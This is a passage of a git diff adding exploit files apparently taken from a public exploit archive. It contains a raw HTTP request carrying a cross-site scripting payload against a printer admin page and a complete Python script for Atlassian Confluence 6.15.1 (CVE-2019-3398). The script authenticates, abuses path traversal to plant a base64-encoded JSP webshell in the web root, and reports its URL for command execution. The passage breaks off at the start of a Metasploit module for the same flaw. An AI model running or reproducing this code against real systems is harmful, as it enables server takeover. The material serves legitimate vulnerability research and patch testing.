+admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
+
+--------------------------------------------------------------------------------------------------------
+XSS Poc:
+--------------------------------------------------------------------------------------------------------
+POST /en/conf_admin.html HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/73.0.3683.75 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,pt;q=0.8
+Cache-Control: max-age=0
+Referer: http://printer.com/en/conf_admin.html
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
+admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47621.py b/exploits/jsp/webapps/47621.py
new file mode 100755
index 000000000..9cc6c0476
--- /dev/null
+++ b/exploits/jsp/webapps/47621.py
@@ -0,0 +1,357 @@
+# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: max7253
+# Vendor Homepage: https://www.atlassian.com
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: 6.15.1
+# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
+# CVE : 2019-3398
+
+#Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)
+#To use this exploit you should specify the following variables:
+#OS - Linux or Windows.
+#PROTO - http or https.
+#USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
+#HOSTNAME - the domain name or IP address of the server and its port.
+#ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
+#Typical ROOTFOLDER locations are:
+#Windows: Program Files/Atlassian/Confluence/confluence/pages/
+#Linux: opt/atlassian/confluence/confluence/pages/
+#Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
+#PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
+#For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
+#If PAGEID is set to 0, the script will try to create a new Page ID in one of the available spaces. If it fails, it will try to create a new space and create a Page ID there.
+#If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range and try to upload shellcode till it succeeds.
+#The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the webshell, then imitates the 'Download all' action to place the webshell to the root directory of the web server.
+#Tested on Atlassian v6.15.1. on Linux and Windows.
+#Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
+import requests
+import urllib3
+import base64
+from bs4 import BeautifulSoup
+import numpy as np
+import re
+import json
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+OS = 'Windows' #change this parameter
+PROTO = 'http' #change this parameter
+USERNAME = 'test' #change this parameter
+PASSWORD = 'test' #change this parameter
+HOSTNAME = '192.168.198.144:8090' #change this parameter
+ROOTFOLDER = 'Program Files/Atlassian/Confluence/confluence/pages/' #change this parameter (Windows)
+#ROOTFOLDER = 'opt/atlassian/confluence/confluence/pages/' #change this parameter (Linux)
+PAGEID = '0'#'1245201' #change this parameter
+PAGEID_RANGE_START = np.int64(1) #change this parameter
+PAGEID_RANGE_END = np.int64(999999999999) #change this parameter
+ATLTOKEN = ''
+LOGINURL = '%s://%s/dologin.action' % (PROTO, HOSTNAME)
+UPLOADURL = '%s://%s/plugins/drag-and-drop/upload.action' % (PROTO, HOSTNAME)
+DOWNLOADALLURL = '%s://%s/pages/downloadallattachments.action' % (PROTO, HOSTNAME)
+CREATEPAGEURL = '%s://%s/pages/createpage.action?spaceKey=' % (PROTO, HOSTNAME)
+VIEWSPACESURL= '%s://%s/rest/api/space' % (PROTO, HOSTNAME)
+WEBSHELLURL = '%s://%s/pages/assist.jsp' % (PROTO, HOSTNAME)
+
+SHELLCODE_WINDOWS = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
+48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
+VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
+I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
+dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
+BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
+MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
+VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
+NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
+AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
+dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
+VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
+MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
+AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMDlcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlc \
+dTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
+FcdTAwNkVcdTAwNjRcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAw \
+NTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdT \
+AwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNjVcdTAwMjJcdTAwMkNc \
+dTAwMjBcdTAwMjJcdTAwMkZcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNz \
+FcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAw \
+NjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdT \
+AwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNj \
+NcdTAwNjVcdTAwNzNcdTAwNzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAw \
+NzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdT \
+AwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVc \
+dTAwNjVcdTAwNzhcdTAwNjVcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
+FcdTAwNkVcdTAwNjRcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdT \
+AwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBc \
+dTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNz \
+RcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAw \
+MjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwMjBcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
+dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
+BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAw \
+NTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdT \
+AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFc \
+dTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNz \
+JcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAw \
+MjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdT \
+AwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRc \
+dTAwMjhcdTAwNjlcdTAwNkVcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAw \
+NjdcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVc \
+dTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAw \
+MjhcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAw \
+NzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdT \
+AwNzNcdTAwNzJcdTAwMjlcdTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBc \
+dTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNj \
+RcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAw \
+MEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT \
+4KPC9wcmU+CjwvQk9EWT48L0hUTUw+'
+
+SHELLCODE_LINUX ='PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
+48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
+VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
+I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
+dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
+BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
+MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
+AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
+VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
+NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
+AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
+dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
+VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
+MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
+AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNU \
+JcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
+MjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdT \
+AwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdTAwMjJcdTAwMkZcdTAwNjJc \
+dTAwNjlcdTAwNkVcdTAwMkZcdTAwNzNcdTAwNjhcdTAwMjJcdTAwMkNcdTAwMjBcdTAwMjJcdTAwMk \
+RcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAw \
+NzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdT \
+AwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRc \
+dTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNjNcdTAwNjVcdTAwNzNcdTAw \
+NzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdT \
+AwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTJcdTAwNzVcdTAwNkVc \
+dTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNj \
+VcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
+MjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
+dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
+BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAw \
+NzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdT \
+AwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDlc \
+dTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNk \
+RcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAw \
+NjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdT \
+AwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBc \
+dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwND \
+lcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAw \
+NkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdT \
+AwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVc \
+dTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwNjlcdTAwNk \
+VcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVc \
+dTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMj \
+lcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAwMjhcdTAwMjBcdTAwNjRcdT \
+AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNzVcdTAwNkNc \
+dTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
+BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
+MjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAwNzBcdTAwNzJcdTAwNjlcdT \
+AwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjlc \
+dTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNj \
+RcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAw \
+NkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAwMEFcdTAwMjBcdTAwMjBcdT \
+AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT4KPC9wcmU+CjwvQk9EWT48 \
+L0hUTUw+'
+session = requests.session()
+#proxies = {
+# 'http': 'http://127.0.0.1:8080',
+# 'https': 'https://127.0.0.1:8080'
+#}
+
+def do_authenticate():
+ global ATLTOKEN
+ auth_form_data = {
+ 'os_username': USERNAME,
+ 'os_password': PASSWORD,
+ 'login': 'Log+in',
+ 'os_destination': ''
+ }
+
+ r = session.post(LOGINURL, data=auth_form_data, allow_redirects=True, verify=False)#, proxies=proxies)
+
+ if r.text.find('re-enter your login') != -1:
+ print 'Authentication failed'
+ return 0
+ elif r.text.find('Sorry, your username and/or password are incorrect') != -1:
+ print 'Authentication failed'
+ return 0
+ elif r.text.find('Unauthorized') != -1:
+ print 'Unauthorized'
+ return 0
+ else:
+ print 'Authentication successful'
+
+ soup = BeautifulSoup(r.text, 'html.parser')
+ ATLTOKEN = soup.find('meta', {'id': 'atlassian-token'})['content']
+ print 'Atlassian token %s' % (ATLTOKEN)
+ return 1
+
+def do_upload(_pageid):
+ if OS == 'Windows':
+ upload_form_data = SHELLCODE_WINDOWS
+
+ upload_req_params = {
+ 'pageId': _pageid,
+ 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
+ 'size': '3474',
+ 'mimeType': 'text/plain',
+ 'spaceKey': 'isis',
+ 'atl_token': ATLTOKEN,
+ 'name': 'assist'
+ }
+ elif OS == 'Linux':
+
+ upload_form_data = SHELLCODE_LINUX
+ upload_req_params = {
+ 'pageId': _pageid,
+ 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
+ 'size': '3516',
+ 'mimeType': 'text/plain',
+ 'spaceKey': 'isis',
+ 'atl_token': ATLTOKEN,
+ 'name': 'assist'
+ }
+
+ print 'Uploading webshell'
+ r = session.post(UPLOADURL, params=upload_req_params, data=base64.decodestring(upload_form_data), allow_redirects=True, verify=False)#, proxies=proxies)
+ if r.status_code == 200 and r.text.find('actionErrors') == -1:
+ print 'Webshell uploaded'
+ return 1
+ else:
+ print 'Error while uploading webshell'
+ return 0
+
+def do_downloadall(_pageid):
+ downloadall_req_params = {
+ 'pageId': _pageid
+ }
+ print 'Moving webshell to the root directory of the web server'
+ r = session.get(DOWNLOADALLURL, params=downloadall_req_params, allow_redirects=True, verify=False)#, proxies=proxies)
+ r = session.get(WEBSHELLURL, allow_redirects=True, verify=False)#, proxies=proxies)
+
+ if r.status_code == 200:
+ print 'Webshell found'
+ print 'Visit %s' % WEBSHELLURL
+ return 1
+ else:
+ print 'Webshell not found'
+ return 0
+def do_getspaces():
+ print 'Getting spaces'
+ r = session.get(VIEWSPACESURL, allow_redirects=True, verify=False)#, proxies=proxies)
+ spacelist = re.findall(r'\"key\":\"(\w+)\"', r.text)
+ return spacelist
+
+def do_createspace():
+ print 'Creating space'
+ upload_form_data = json.dumps({
+ "key": "TST1",
+ "name": "Example space",
+ "description": {
+ "plain": {
+ "value": "This is an example space",
+ "representation": "plain"
+ }
+ },
+ "metadata": {}
+ })
+
+ headers = {
+ 'Content-Type': 'application/json'
+ }
+ r = session.post(VIEWSPACESURL, data=upload_form_data, headers=headers, allow_redirects=True, verify=False)#, proxies=proxies)
+
+ matched = re.match(".*\"key\":\"(\w+)\".*", r.text)
+ if matched:
+ print 'Space created'
+ return matched.group(1)
+ else:
+ print 'Space not created'
+ return 0
+
+def do_createpage(space):
+ global PAGEID
+ print 'Trying %s space' % (space)
+ r = session.get(CREATEPAGEURL+space, allow_redirects=True, verify=False)#, proxies=proxies)
+ if r.status_code == 200 and r.text.find('ajs-draft-id') != -1:
+ soup = BeautifulSoup(r.text, 'html.parser')
+ pageid = soup.find('meta', {'name': 'ajs-draft-id'})['content']
+ pageid_pattern = re.compile("^(\d+)$")
+ if pageid_pattern.match(pageid):
+ PAGEID = pageid
+ print 'Page ID created %s' % (pageid)
+ return 1
+ else:
+ print 'Unexpected Page ID format'
+ return 0
+ else:
+ print 'Page ID not created'
+ return 0
+
+
+def main():
+ if do_authenticate() != 1:
+ exit()
+
+ if PAGEID != '':
+ if PAGEID == '0':
+ spaces = do_getspaces()
+ for sp in spaces:
+ if do_createpage(sp) == 1:
+ if do_upload(PAGEID) != 1:
+ continue
+ if do_downloadall(PAGEID) != 1:
+ continue
+ else:
+ exit()
+ new_sp = do_createspace()
+ if new_sp != 0:
+ if do_createpage(new_sp) == 1:
+ if do_upload(PAGEID) != 1:
+ exit()
+ if do_downloadall(PAGEID) != 1:
+ exit()
+ exit()
+ else:
+ exit()
+ else:
+ exit()
+ if do_upload(PAGEID) != 1:
+ exit()
+ if do_downloadall(PAGEID) != 1:
+ exit()
+ else:
+ ID = PAGEID_RANGE_START
+ while ID <= PAGEID_RANGE_END:
+ print 'Trying Page Id %d' % (ID)
+ if do_upload(ID) == 1:
+ if do_downloadall(ID) == 1:
+ break
+ ID += 1
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47635.rb b/exploits/jsp/webapps/47635.rb
new file mode 100755
index 000000000..d2f630a18
--- /dev/null
+++ b/exploits/jsp/webapps/47635.rb
@@ -0,0 +1,398 @@
+# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: max7253
+# Vendor Homepage: https://www.atlassian.com
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: 6.15.1
+# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
+# CVE : N/A
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)",
+ 'Description' => %q{
+ To use this exploit you should specify the following variables:
